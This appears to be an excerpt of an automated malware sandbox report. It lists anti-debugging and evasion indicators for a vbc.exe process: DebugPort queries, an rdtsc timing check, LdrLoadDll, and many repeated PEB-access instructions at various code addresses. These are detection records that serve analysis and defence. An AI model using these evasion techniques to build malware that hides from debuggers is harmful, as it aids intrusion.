Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 13_2_053DD1C0 rdtsc

13_2_053DD1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 13_2_009C7953 LdrLoadDll,

13_2_009C7953

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535 mov eax, dword ptr fs:[00000030h]	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535 mov eax, dword ptr fs:[00000030h]	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535 mov eax, dword ptr fs:[00000030h]	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535 mov eax, dword ptr fs:[00000030h]	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535 mov eax, dword ptr fs:[00000030h]	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370535 mov eax, dword ptr fs:[00000030h]	13_2_05370535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D534 mov eax, dword ptr fs:[00000030h]	13_2_0536D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D534 mov eax, dword ptr fs:[00000030h]	13_2_0536D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D534 mov eax, dword ptr fs:[00000030h]	13_2_0536D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D534 mov eax, dword ptr fs:[00000030h]	13_2_0536D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D534 mov eax, dword ptr fs:[00000030h]	13_2_0536D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536D534 mov eax, dword ptr fs:[00000030h]	13_2_0536D534
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E53E mov eax, dword ptr fs:[00000030h]	13_2_0538E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E53E mov eax, dword ptr fs:[00000030h]	13_2_0538E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E53E mov eax, dword ptr fs:[00000030h]	13_2_0538E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E53E mov eax, dword ptr fs:[00000030h]	13_2_0538E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E53E mov eax, dword ptr fs:[00000030h]	13_2_0538E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539D530 mov eax, dword ptr fs:[00000030h]	13_2_0539D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539D530 mov eax, dword ptr fs:[00000030h]	13_2_0539D530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05397505 mov eax, dword ptr fs:[00000030h]	13_2_05397505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05397505 mov ecx, dword ptr fs:[00000030h]	13_2_05397505
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05434500 mov eax, dword ptr fs:[00000030h]	13_2_05434500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539B570 mov eax, dword ptr fs:[00000030h]	13_2_0539B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539B570 mov eax, dword ptr fs:[00000030h]	13_2_0539B570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539656A mov eax, dword ptr fs:[00000030h]	13_2_0539656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539656A mov eax, dword ptr fs:[00000030h]	13_2_0539656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539656A mov eax, dword ptr fs:[00000030h]	13_2_0539656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B562 mov eax, dword ptr fs:[00000030h]	13_2_0535B562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540F525 mov eax, dword ptr fs:[00000030h]	13_2_0540F525
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05368550 mov eax, dword ptr fs:[00000030h]	13_2_05368550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05368550 mov eax, dword ptr fs:[00000030h]	13_2_05368550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541B52F mov eax, dword ptr fs:[00000030h]	13_2_0541B52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05435537 mov eax, dword ptr fs:[00000030h]	13_2_05435537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F35BA mov eax, dword ptr fs:[00000030h]	13_2_053F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F35BA mov eax, dword ptr fs:[00000030h]	13_2_053F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F35BA mov eax, dword ptr fs:[00000030h]	13_2_053F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053F35BA mov eax, dword ptr fs:[00000030h]	13_2_053F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538F5B0 mov eax, dword ptr fs:[00000030h]	13_2_0538F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053845B1 mov eax, dword ptr fs:[00000030h]	13_2_053845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053845B1 mov eax, dword ptr fs:[00000030h]	13_2_053845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054355C9 mov eax, dword ptr fs:[00000030h]	13_2_054355C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815A9 mov eax, dword ptr fs:[00000030h]	13_2_053815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815A9 mov eax, dword ptr fs:[00000030h]	13_2_053815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815A9 mov eax, dword ptr fs:[00000030h]	13_2_053815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815A9 mov eax, dword ptr fs:[00000030h]	13_2_053815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815A9 mov eax, dword ptr fs:[00000030h]	13_2_053815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054335D7 mov eax, dword ptr fs:[00000030h]	13_2_054335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054335D7 mov eax, dword ptr fs:[00000030h]	13_2_054335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054335D7 mov eax, dword ptr fs:[00000030h]	13_2_054335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E05A7 mov eax, dword ptr fs:[00000030h]	13_2_053E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E05A7 mov eax, dword ptr fs:[00000030h]	13_2_053E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E05A7 mov eax, dword ptr fs:[00000030h]	13_2_053E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E59C mov eax, dword ptr fs:[00000030h]	13_2_0539E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EB594 mov eax, dword ptr fs:[00000030h]	13_2_053EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EB594 mov eax, dword ptr fs:[00000030h]	13_2_053EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05394588 mov eax, dword ptr fs:[00000030h]	13_2_05394588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05362582 mov eax, dword ptr fs:[00000030h]	13_2_05362582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05362582 mov ecx, dword ptr fs:[00000030h]	13_2_05362582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535758F mov eax, dword ptr fs:[00000030h]	13_2_0535758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535758F mov eax, dword ptr fs:[00000030h]	13_2_0535758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535758F mov eax, dword ptr fs:[00000030h]	13_2_0535758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815F4 mov eax, dword ptr fs:[00000030h]	13_2_053815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815F4 mov eax, dword ptr fs:[00000030h]	13_2_053815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815F4 mov eax, dword ptr fs:[00000030h]	13_2_053815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815F4 mov eax, dword ptr fs:[00000030h]	13_2_053815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815F4 mov eax, dword ptr fs:[00000030h]	13_2_053815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053815F4 mov eax, dword ptr fs:[00000030h]	13_2_053815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539C5ED mov eax, dword ptr fs:[00000030h]	13_2_0539C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539C5ED mov eax, dword ptr fs:[00000030h]	13_2_0539C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053625E0 mov eax, dword ptr fs:[00000030h]	13_2_053625E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538E5E7 mov eax, dword ptr fs:[00000030h]	13_2_0538E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053895DA mov eax, dword ptr fs:[00000030h]	13_2_053895DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053665D0 mov eax, dword ptr fs:[00000030h]	13_2_053665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A5D0 mov eax, dword ptr fs:[00000030h]	13_2_0539A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A5D0 mov eax, dword ptr fs:[00000030h]	13_2_0539A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DD5D0 mov eax, dword ptr fs:[00000030h]	13_2_053DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DD5D0 mov ecx, dword ptr fs:[00000030h]	13_2_053DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E5CF mov eax, dword ptr fs:[00000030h]	13_2_0539E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E5CF mov eax, dword ptr fs:[00000030h]	13_2_0539E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053955C0 mov eax, dword ptr fs:[00000030h]	13_2_053955C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541F5BE mov eax, dword ptr fs:[00000030h]	13_2_0541F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539A430 mov eax, dword ptr fs:[00000030h]	13_2_0539A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541F453 mov eax, dword ptr fs:[00000030h]	13_2_0541F453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535C427 mov eax, dword ptr fs:[00000030h]	13_2_0535C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535E420 mov eax, dword ptr fs:[00000030h]	13_2_0535E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535E420 mov eax, dword ptr fs:[00000030h]	13_2_0535E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535E420 mov eax, dword ptr fs:[00000030h]	13_2_0535E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E6420 mov eax, dword ptr fs:[00000030h]	13_2_053E6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E7410 mov eax, dword ptr fs:[00000030h]	13_2_053E7410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538340D mov eax, dword ptr fs:[00000030h]	13_2_0538340D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05398402 mov eax, dword ptr fs:[00000030h]	13_2_05398402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05398402 mov eax, dword ptr fs:[00000030h]	13_2_05398402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05398402 mov eax, dword ptr fs:[00000030h]	13_2_05398402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543547F mov eax, dword ptr fs:[00000030h]	13_2_0543547F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538A470 mov eax, dword ptr fs:[00000030h]	13_2_0538A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538A470 mov eax, dword ptr fs:[00000030h]	13_2_0538A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538A470 mov eax, dword ptr fs:[00000030h]	13_2_0538A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361460 mov eax, dword ptr fs:[00000030h]	13_2_05361460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361460 mov eax, dword ptr fs:[00000030h]	13_2_05361460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361460 mov eax, dword ptr fs:[00000030h]	13_2_05361460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361460 mov eax, dword ptr fs:[00000030h]	13_2_05361460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05361460 mov eax, dword ptr fs:[00000030h]	13_2_05361460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F460 mov eax, dword ptr fs:[00000030h]	13_2_0537F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F460 mov eax, dword ptr fs:[00000030h]	13_2_0537F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F460 mov eax, dword ptr fs:[00000030h]	13_2_0537F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F460 mov eax, dword ptr fs:[00000030h]	13_2_0537F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F460 mov eax, dword ptr fs:[00000030h]	13_2_0537F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F460 mov eax, dword ptr fs:[00000030h]	13_2_0537F460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538245A mov eax, dword ptr fs:[00000030h]	13_2_0538245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535645D mov eax, dword ptr fs:[00000030h]	13_2_0535645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B440 mov eax, dword ptr fs:[00000030h]	13_2_0536B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B440 mov eax, dword ptr fs:[00000030h]	13_2_0536B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B440 mov eax, dword ptr fs:[00000030h]	13_2_0536B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B440 mov eax, dword ptr fs:[00000030h]	13_2_0536B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B440 mov eax, dword ptr fs:[00000030h]	13_2_0536B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536B440 mov eax, dword ptr fs:[00000030h]	13_2_0536B440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E443 mov eax, dword ptr fs:[00000030h]	13_2_0539E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053934B0 mov eax, dword ptr fs:[00000030h]	13_2_053934B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053944B0 mov ecx, dword ptr fs:[00000030h]	13_2_053944B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053EA4B0 mov eax, dword ptr fs:[00000030h]	13_2_053EA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054354DB mov eax, dword ptr fs:[00000030h]	13_2_054354DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053664AB mov eax, dword ptr fs:[00000030h]	13_2_053664AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054094E0 mov eax, dword ptr fs:[00000030h]	13_2_054094E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05369486 mov eax, dword ptr fs:[00000030h]	13_2_05369486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05369486 mov eax, dword ptr fs:[00000030h]	13_2_05369486
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0535B480 mov eax, dword ptr fs:[00000030h]	13_2_0535B480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053604E5 mov ecx, dword ptr fs:[00000030h]	13_2_053604E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539273C mov eax, dword ptr fs:[00000030h]	13_2_0539273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539273C mov ecx, dword ptr fs:[00000030h]	13_2_0539273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539273C mov eax, dword ptr fs:[00000030h]	13_2_0539273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05359730 mov eax, dword ptr fs:[00000030h]	13_2_05359730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05359730 mov eax, dword ptr fs:[00000030h]	13_2_05359730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05433749 mov eax, dword ptr fs:[00000030h]	13_2_05433749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536973A mov eax, dword ptr fs:[00000030h]	13_2_0536973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536973A mov eax, dword ptr fs:[00000030h]	13_2_0536973A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DC730 mov eax, dword ptr fs:[00000030h]	13_2_053DC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05395734 mov eax, dword ptr fs:[00000030h]	13_2_05395734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05363720 mov eax, dword ptr fs:[00000030h]	13_2_05363720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F720 mov eax, dword ptr fs:[00000030h]	13_2_0537F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F720 mov eax, dword ptr fs:[00000030h]	13_2_0537F720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537F720 mov eax, dword ptr fs:[00000030h]	13_2_0537F720
